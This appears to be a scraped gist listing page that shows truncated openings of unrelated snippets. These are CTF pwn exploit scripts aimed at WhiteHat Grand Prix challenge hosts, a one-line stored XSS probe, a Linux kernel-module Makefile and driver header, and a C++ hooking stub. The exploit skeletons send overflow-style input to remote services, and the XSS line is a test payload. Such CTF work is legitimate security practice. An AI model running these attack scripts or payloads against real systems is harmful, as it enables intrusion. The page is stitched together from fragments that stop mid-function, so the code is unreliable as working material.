Skip to content

Instantly share code, notes, and snippets.

import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
from Pwn import *
p = Pwn(mode=1)
def pA32(*args):
binary = ''
for arg in args:
binary += p.p32(arg)
return binary
alert("Stored XSS");
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import re
p = Pwn(host='47.74.147.103',port=20001,mode=1)
# p = Pwn(mode=1)
def exploit(**kargs):
obj-m+=ebbchar.o
all:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
$(CC) testebbchar.c -o test
clean:
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean
rm test
/**
* @file ebbchar.c
* @author Derek Molloy
* @date 7 April 2015
* @version 0.1
* @brief An introductory character driver to support the second article of my series on
* Linux loadable kernel module (LKM) development. This module maps to /dev/ebbchar and
* comes with a helper C program that can be run in Linux user space to communicate with
* this the LKM.
* @see http://www.derekmolloy.ie/ for a full description and follow-up descriptions.
// SimpleHooking.cpp : Defines the entry point for the console application.
// Author : peternguyen
#include "stdafx.h"
#include <string>
#include <iostream>
#include <stdlib.h>
using namespace std;
#Pwn 500 WhitehatGrangrix 2016
from Pwn import *
# p = Pwn(elf='./note')
p = Pwn(elf='./note',host='118.70.186.203',port=23501)
key_1 = [
0xd49f6a35,0xa8733e09,0x7c4712dd,0x501be6b1,
0x24efba85,0xf8c38e59,0xcc97622d,0xa06b3601,
0x743f0ad5,0x4813dea9,0x1ce7b27d,0xf0bb8651,
from Pwn import *
p = Pwn(elf='./merge_str',host='bakpwn06.grandprix.whitehatvn.com',port=23506)
def exploit():
p.connect()
p.read_until(':')
p.sendline('A'*50)
p.read_until(':')
from Pwn import *
import re
# p = Pwn(elf='./pwn004')
p = Pwn(elf='./pwn004',host='bakpwn04.grandprix.whitehatvn.com',port=23504)
def play_game(money,locky_number):
p.read_until('>')
p.sendint(1)
p.read_until('>')